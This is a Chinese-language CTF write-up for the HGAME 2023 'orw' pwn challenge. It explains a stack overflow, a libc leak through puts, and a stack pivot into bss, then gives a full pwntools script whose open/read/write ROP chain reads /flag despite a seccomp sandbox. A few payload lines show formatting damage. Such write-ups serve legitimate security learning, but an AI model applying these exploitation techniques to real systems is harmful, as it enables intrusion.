Problem: [HGAME 2023 week1]orw
[[toc]]
思路
- 解题大致思路
- 没有 canary 没有pie 给了libc
首先程序有一个溢出点 可以多溢出0x30个字节首先利用puts实现泄露libc
得到libc基地址然后可以得到pop_rdx_ret 地址为后面orw做铺垫
用ROPgadget得到pop_rdi_ret pop_rsi_r15_ret

程序开了沙盒不能使用execve函数跟题目描述一样orw读取flag

前面得到了libc基地址又给了libc所以直接得到open write read函数地址
然后把orw写入bss段这里取的是0x404300 然后在rbp写入bss地址 调用read函数 这里要注意调用read函数时候要把rbp-0x100只后在给rsi因此此处rbp应该是0x404300 + 0x100

exp在下面
EXP
- 具体攻击代码
#!/usr/bin/env python
# coding=utf-8
**from pwn import ***
**from LibcSearcher import ***
#io=remote('node5.anna.nssctf.cn',28955)
context(log_level='debug',arch='amd64',os='linux')
pwnfile = '../orw'
io = process(pwnfile)
elf = ELF(pwnfile)
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
p_rdi = 0x401393
ret =0x40101a
pp_rsi_r15 = 0x401391
vuln = 0x4012C0
main = 0x4012F0
io.recvuntil(b'Maybe you can learn something about seccomp, before you try to solve this task.')
*payload = b'a'0x108 + p64(p_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.send(payload)
io.recvuntil(b'\n')
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
success('puts_addr----->'+hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
p_rdx = libc_base + 0x0000000000142c92
oopen = libc_base + 0x10dce0
read = libc_base + 0x10dfc0
write = libc_base + 0x10e060
bss = 0x404300
gdb.attach(io)
call_read = 0x4012CF
io.recvuntil(b'Maybe you can learn something about seccomp, before you try to solve this task.')
*payload= b'a'0x100+p64(bss+0x100)+ p64(call_read)
io.send(payload)
#sleep(1)
leave_ret =0x4012EE
#gdb.attach(io)
*payload = b'/flag\0\0\0' + p64(p_rdi)+ p64(bss)+p64(pp_rsi_r15)+p64(0)2 +p64(p_rdx)+p64(0) + p64(oopen)
*payload += p64(p_rdi) + p64(3) + p64(pp_rsi_r15) + p64(bss)2 + p64(p_rdx) + p64(0x40) + p64(read)
*payload += p64(p_rdi) + p64(1) + p64(pp_rsi_r15) + p64(bss)2 + p64(p_rdx) + p64(0x40) + p64(write)
#io.recvuntil(b'Maybe you can learn something about seccomp, before you try to solve this task.')
payload = payload.ljust(0x100,b'a')
payload += p64(bss) + p64(leave_ret)
#io.recvuntil(b'Maybe you can learn something about seccomp, before you try to solve this task.')
io.sendline(payload)
io.interactive()
总结
- 对该题的考点总结
orw

这个0x404300的地址是咋找出来的